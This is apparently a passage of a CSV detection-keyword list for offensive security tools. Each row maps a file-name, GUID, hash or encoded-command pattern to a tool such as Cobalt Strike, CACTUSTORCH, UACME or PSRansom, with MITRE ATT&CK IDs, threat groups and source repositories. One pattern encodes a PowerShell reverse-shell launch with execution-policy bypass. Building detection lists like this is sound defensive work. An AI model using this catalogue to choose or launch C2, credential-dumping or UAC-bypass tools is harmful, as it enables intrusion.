TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","457","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" +"*c2-logs.txt*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*c2profile.profile*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*C2ProfileManager.*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*C2ProfileResponse.cs*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*-c2-randomizer.py*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based 
detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*C2ReverseClint*","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","457","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" +"*C2ReverseProxy*","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","457","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" +"*C2ReverseServer*","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 
- T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","457","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" +"*C2script/proxy.*","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","457","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" +"*'c2server'*","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","0","N/A","10","10","553","114","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" +"*C2Server.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*C2Server.ps1*","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. 
This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","C2","https://github.com/JoelGMSec/PSRansom","1","1","N/A","10","4","371","95","2022-09-29T09:54:34Z","2022-02-27T11:52:03Z" +"*c2server_arm_musl*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*c2server_armv7*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*c2server_debug*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*c2server_linux*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - 
TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*c2server_macos*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*c2server_release*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*c2server_windows*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*C2TaskMessage.*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*c2VydmVyMS5jaWEuZ292*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data 
exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*C2WebSocketHandler.*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*c4d57f02dd8276fb3df81442bda345d4c3004dfc2842b2140ac9e71b30fd743b*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*c51beca480d6e6f88174698503c0856c56488a59101d259c068dccb0902b01ec*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*C526B877-6AFF-413C-BC03-1837FB63BC22*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" +"*c708b83f-4167-4b4c-a1db-d2011ecb3200*","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - 
TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","212","40","2021-04-23T14:40:52Z","2020-02-18T12:22:50Z" +"*c725919e6357126d512c638f993cf572112f323da359645e4088f789eb4c7b8c*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*C73A4893-A5D1-44C8-900C-7B8850BBD2EC*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" +"*C7E4B529-6372-449A-9184-74E74E432FE8*","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). 
To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","0","N/A","9","2","144","28","2023-08-08T15:21:28Z","2023-08-05T19:24:36Z" +"*C8482002-F594-4C28-9C46-960B036540A8*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","0","N/A","10","10","1329","425","2023-10-04T18:54:15Z","2020-04-23T14:04:16Z" +"*c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*ca0b7a38be2f3f63a69aca6da7b3a62a59fcefee92de00e9796f68d4a2a23158*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*CA280845-1F10-4E65-9DE7-D9C6513BBD91*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","9","1","64","12","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" 
+"*cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAALQBGAGkAbABlACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAUwBoAGUAbABsADMAZQByAC4AcABzADEA*","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059.001 - T1021.004 - T1090.002","TA0002 - TA0011","N/A","N/A","shell spawning","https://github.com/yehia-mamdouh/Shell3er/blob/main/Shell3er.ps1","1","0","N/A","N/A","1","56","11","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z" +"*cache_activedirectory.py*","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","N/A","3","219","26","2023-10-02T20:36:02Z","2018-10-22T18:21:44Z" +"*cachedump.exe*","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*cachedump64.exe*","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*CACTUSTORCH*","offensive_tool_keyword","CACTUSTORCH","A JavaScript and VBScript shellcode launcher. 
This will spawn a 32 bit version of the binary specified and inject shellcode into it.","T1059 - T1055 - T1218 - T1027","TA0002 - TA0008 - TA0011","N/A","N/A","Exploitation tools","https://github.com/mdsecactivebreach/CACTUSTORCH","1","0","N/A","N/A","10","980","241","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" +"*CACTUSTORCH.cna*","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","10","10","980","241","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" +"*CACTUSTORCH.cs*","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 
- T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","10","10","980","241","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" +"*CACTUSTORCH.hta*","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","10","10","980","241","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" +"*CACTUSTORCH.js*","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","10","10","980","241","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" +"*CACTUSTORCH.vba*","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","10","10","980","241","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" +"*CACTUSTORCH.vbe*","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - 